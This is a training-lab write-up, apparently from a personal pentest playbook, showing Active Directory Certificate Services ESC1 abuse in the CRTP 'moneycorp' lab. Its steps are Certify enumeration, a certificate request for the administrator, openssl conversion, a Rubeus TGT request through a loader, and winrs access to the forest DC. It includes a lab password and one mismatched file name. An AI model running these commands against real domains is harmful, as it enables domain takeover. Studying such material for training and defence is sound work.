# CRTP Lab 21 ## Task 1 Check if AD CS is used by the target forest and find any vulnerable/abusable templates. Use certify to check for AD CS: {% code overflow="wrap" %} ``` C:\AD\Tools\Certify.exe cas [*] Enterprise/Enrollment CAs: Enterprise CA Name : moneycorp-MCORP-DC-CA DNS Hostname : mcorp-dc.moneycorp.local FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8 Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49 Cert Start Date : 11/26/2022 1:59:16 AM Cert End Date : 11/26/2032 2:09:15 AM Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local UserSpecifiedSAN : Could not connect to the HKLM hive - Attempted to perform an unauthorized operation. CA Permissions : ``` {% endcode %} We can find all the templates using "find" {% code overflow="wrap" %} ``` Certify.exe find Template Name : SmartCardEnrollment-Agent Schema Version : 2 Validity Period : 10 years Renewal Period : 6 weeks msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH mspki-enrollment-flag : AUTO_ENROLLMENT Authorized Signatures Required : 0 pkiextendedkeyusage : Certificate Request Agent mspki-certificate-application-policy : Certificate Request Agent Permissions Enrollment Permissions Enrollment Rights : dcorp\Domain Users S-1- 5-21-719815819-3726368948-3917688648-513 [snip] Template Name : HTTPSCertificates Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT [snip] ``` {% endcode %} ## Task 2 Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin. We could try to find templates with "ENROLLEE\_SUPPLIES\_SUBJECT" value to escalate to DA and EA using ESC1 {% code overflow="wrap" %} ``` C:\AD\Tools>C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA Template Name : HTTPSCertificates Schema Version : 2 Validity Period : 10 years Renewal Period : 6 weeks msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email Permissions Enrollment Permissions Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-3726368948-3917688648-1123 mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 Object Control Permissions Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500 WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500 mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500 mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500 mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 ``` {% endcode %} The HTTPSCertificates template has the "ENROLLEE\_SUPPLIES\_SUBJECT" value where enrollement rights are with dcorp\RDPUsers Since student is a member of RDPUsers group, we can request certificate for any user as student. Here we request certificate for the Domain Administrator of the current domain. {% code overflow="wrap" %} ``` C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator ``` {% endcode %} Copy all contents between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to esc1.pem. We need to convert this to PFX and use it. Use openssl binary to do this and set a password. {% code overflow="wrap" %} ``` C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx WARNING: can't open config file: /usr/local/ssl/openssl.cnf Enter Export Password: Verifying - Enter Export Password: ``` {% endcode %} Use the PFX created above with Rubeus to request a TGT for DA. {% code overflow="wrap" %} ``` # ArgSplit for asktgt C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:administrator /certificate:esc3-DA.pfx /password:SecretPass@123 /ptt ``` {% endcode %} We can now access mcorp-dc {% code overflow="wrap" %} ``` C:\AD\Tools>winrs -r:mcorp-dc cmd /c set username USERNAME=Administrator C:\AD\Tools>winrs -r:mcorp-dc cmd /c set computername COMPUTERNAME=MCORP-DC C:\AD\Tools> ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/domain-privilege-escalation/across-trusts/ad-cs-across-domain-trusts/esc1/crtp-lab-21.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.